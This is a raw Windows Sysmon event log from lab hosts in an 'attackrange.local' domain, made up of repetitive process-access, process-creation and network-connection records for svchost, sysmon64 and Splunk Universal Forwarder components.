SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806833Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:48:24.926{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806832Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:24.926{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806831Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:48:24.926{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806830Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:24.926{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806829Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:24.926{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F3C8-60EB-5879-00000000D001}3196C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806828Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:24.926{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F3C8-60EB-5879-00000000D001}3196C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806827Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:24.911{0C1E0330-F3C8-60EB-5879-00000000D001}3196C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001047361Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:24.904{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD479EAD2C08A9BD1D04CEB8714EF0F3,SHA256=EBC42ABF7A372B097DE734537A196C7504B4A6B4BA65015ACC01AA4D2B8D6D13,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806826Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:24.426{0C1E0330-F3C8-60EB-5779-00000000D001}3523512C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806825Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:24.254{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F3C8-60EB-5779-00000000D001}352C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806824Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:24.238{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806823Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:48:24.238{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806822Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:24.238{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806821Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:48:24.238{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806820Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:24.238{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806819Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:48:24.238{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806818Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:24.238{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806817Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:48:24.238{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806816Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:24.238{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806815Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:24.238{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F3C8-60EB-5779-00000000D001}352C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806814Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:24.238{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F3C8-60EB-5779-00000000D001}352C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806813Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:24.239{0C1E0330-F3C8-60EB-5779-00000000D001}352C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001047363Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:25.937{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8A25811EA5D943F5F6C332E7A4772AC,SHA256=99143DB4293EF959447DA7E6133F96C561247FD33C1B76ED6FF1FF532759E609,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806857Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:25.754{0C1E0330-F3C9-60EB-5979-00000000D001}15488C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000806856Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:24.002{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK 
SERVICEtcpfalsefalse181.214.206.218-28122-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 10341000x8000000000000000806855Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:25.613{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F3C9-60EB-5979-00000000D001}1548C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806854Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:25.613{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806853Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:48:25.613{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806852Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 